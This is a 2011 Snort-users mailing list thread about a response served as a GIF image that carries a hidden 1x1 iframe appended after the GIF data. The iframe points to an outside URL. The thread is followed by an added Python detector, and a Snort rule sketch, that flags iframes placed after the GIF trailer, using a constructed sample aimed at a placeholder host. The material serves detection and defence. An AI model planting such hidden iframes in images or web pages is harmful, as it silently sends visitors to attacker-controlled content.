[Snort-users] iFrame's in gifs

James Lay jlay at ...13475...
Fri Jun 24 21:15:25 EDT 2011


Sending now... thanks Joel.

James

On 6/24/11 6:00 PM, "Joel Esler" <jesler at ...1935...> wrote:

>James, 
>
>We'd love a full pcap so we could eliminate fp's and load test.
>
>Email it to VRT@
>
>Sent from my iPhone
>
>On Jun 24, 2011, at 18:10, "Lay, James" <james.lay at ...15009...> wrote:
>
>> Hey all!
>> 
>> Anyone got any leads on this or a sig for this? Excitement below... I
>> have a full pcap as well as the original image if anyone wants them.
>> 
>> James
>> 
>> Sanitized headers
>> 
>> GET /img/ HTTP/1.1
>> Cookie: <snip>
>> Host: magazine.gem-fashion.com
>> Accept: */*
>> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
>> Accept-Language: en-us
>> UA-CPU: x86
>> Connection: Keep-Alive
>> 
>> HTTP/1.1 404 Object Not Found
>> Date: Fri, 24 Jun 2011 21:15:39 GMT
>> Server: Apache
>> X-Powered-By: PHP/5.2.11
>> Expires: Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma: no-cache
>> Set-Cookie: <snip>; path=/
>> Content-Length: 1221
>> Keep-Alive: timeout=5, max=99
>> Connection: Keep-Alive
>> Content-Type: image/gif
>> 
>> 
>> 
>> GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
>> ....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.....
>> ....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.
>> ............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
>> .a
>> .I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B..
>> .....I..H...9P....n%3
>> ....7E...B..-B...
>> JhC..H...G...TaX at ...15318...%. at ...846...!.........l.0.L....3n.r
>> .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:.. at ...15319...#?.r.
>> .....\x.."L.7..6M..-..?r.. at ...2568...
>> ..Q]b.......H4.3....&.........^|X.A..s./g........
>> Y.....O...P.)... at ...979...;..r.p..6y....^..;,w.....i...4..p.x..I..E
>> ...).<2
>> .......$...... ^.2.vo....`.(..y...B
>> M<..1
>> ...dm)....y0.~.. ..D...Cs
>> .'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... at ...15320...
>> .!e.U^.Z..  .. at ...846...@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
>> b.....B..4;.D.r7........P
>> eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2. at ...15321...~
>> ......
>> .!..
>> !p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$..
>> ..q.\....7D..
>> ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
>> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
>> style='visibility: hidden;'></iframe>
>> 
>> 
>> ------------------------------------------------------------------------------
>> All the data continuously generated in your IT infrastructure contains a
>> definitive record of customers, application performance, security
>> threats, fraudulent activity and more. Splunk takes this data and makes
>> sense of it. Business sense. IT sense. Common sense..
>> http://p.sf.net/sfu/splunk-d2d-c1
>> _______________________________________________
>> Snort-users mailing list
>> Snort-users at lists.sourceforge.net
>> Go to this URL to change user options or unsubscribe:
>> https://lists.sourceforge.net/lists/listinfo/snort-users
>> Snort-users list archive:
>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>> 
>> Please see http://www.snort.org/docs for documentation
>
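The artifact in the thread is a response served as image/gif whose body is a real GIF followed by a hidden 1x1 iframe appended after the GIF trailer byte (0x3B). The detector below is an added example, not code from the list or from the Snort VRT: it walks the GIF block structure (header, logical screen descriptor, colour tables, extension and image blocks) to find the trailer precisely, then reports any bytes appended after it and whether they contain an iframe tag. The HTTP response and the GIF it carries are constructed for the example; the iframe mirrors the shape of the one quoted above but points at a placeholder host (example.invalid).

```python
"""
Added example (not from the original post): find data appended after the
trailer of a GIF served over HTTP and flag an <iframe> hidden there.
"""
import re

# Constructed sample: a valid 1x1 GIF89a, then an appended hidden iframe.
SAMPLE_GIF = (
    b"GIF89a"                                    # header
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen descriptor, global color table flag set
    b"\x00\x00\x00\xff\xff\xff"                  # 2-entry global color table
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, no local color table
    b"\x02"                                      # LZW minimum code size
    b"\x02\x44\x01"                              # one 2-byte data sub-block
    b"\x00"                                      # block terminator
    b"\x3b"                                      # GIF trailer
)
APPENDED_HTML = (b"<iframe src='http://example.invalid/index.php' width='1' "
                 b"height='1' style='visibility: hidden;'></iframe>")  # placeholder host (assumption)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: image/gif\r\n"
    b"Content-Length: %d\r\n"
    b"\r\n" % (len(SAMPLE_GIF) + len(APPENDED_HTML))
) + SAMPLE_GIF + APPENDED_HTML

IFRAME_RE = re.compile(rb"<\s*iframe\b", re.IGNORECASE)


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of GIF data sub-blocks terminated by a 0x00 length byte."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1 + n
        if n == 0:
            return pos


def gif_trailer_offset(data: bytes) -> int:
    """Return the offset just past the GIF trailer (0x3B), or raise ValueError
    if the data is not a well-formed GIF."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("missing GIF signature")
    if len(data) < 13:
        raise ValueError("truncated logical screen descriptor")
    packed = data[10]
    pos = 13
    if packed & 0x80:                            # global color table: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                        # trailer: everything after it is foreign
            return pos
        if block == 0x21:                        # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif block == 0x2C:                      # image descriptor (9 bytes)
            if pos + 9 > len(data):
                raise ValueError("truncated image descriptor")
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:                   # local color table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                             # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError("unknown block introducer 0x%02x at %d" % (block, pos - 1))
    raise ValueError("no trailer found")


def split_response(raw: bytes):
    """Split a raw HTTP response into (lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def inspect_gif_response(raw: bytes) -> dict:
    """Flag an image/gif response carrying bytes after the GIF trailer and say
    whether those bytes (or, for an unparseable body, the whole body) hold an <iframe>."""
    headers, body = split_response(raw)
    ctype = headers.get(b"content-type", b"").split(b";")[0].strip().lower()
    result = {"content_type": ctype.decode(), "trailing_bytes": 0, "iframe": False, "parse_error": None}
    if ctype != b"image/gif":
        return result
    try:
        end = gif_trailer_offset(body)
    except ValueError as exc:
        result["parse_error"] = str(exc)
        result["iframe"] = bool(IFRAME_RE.search(body))
        return result
    trailing = body[end:]
    result["trailing_bytes"] = len(trailing)
    result["iframe"] = bool(IFRAME_RE.search(trailing))
    return result


if __name__ == "__main__":
    print(inspect_gif_response(SAMPLE_RESPONSE))
```

Walking the blocks rather than searching the whole body for `<iframe` matters because colour-table and LZW bytes can legitimately contain any byte sequence, so a plain content match over the image produces false positives of exactly the kind the VRT asked for a full pcap to rule out. A Snort rule for the same traffic would roughly pair a `Content-Type: image/gif` match in the HTTP headers with a `nocase` `<iframe` content match under `file_data`, accepting that the rule engine cannot do the trailer walk and so needs the extra `width='1'`/`visibility: hidden` content anchors to stay quiet on real images.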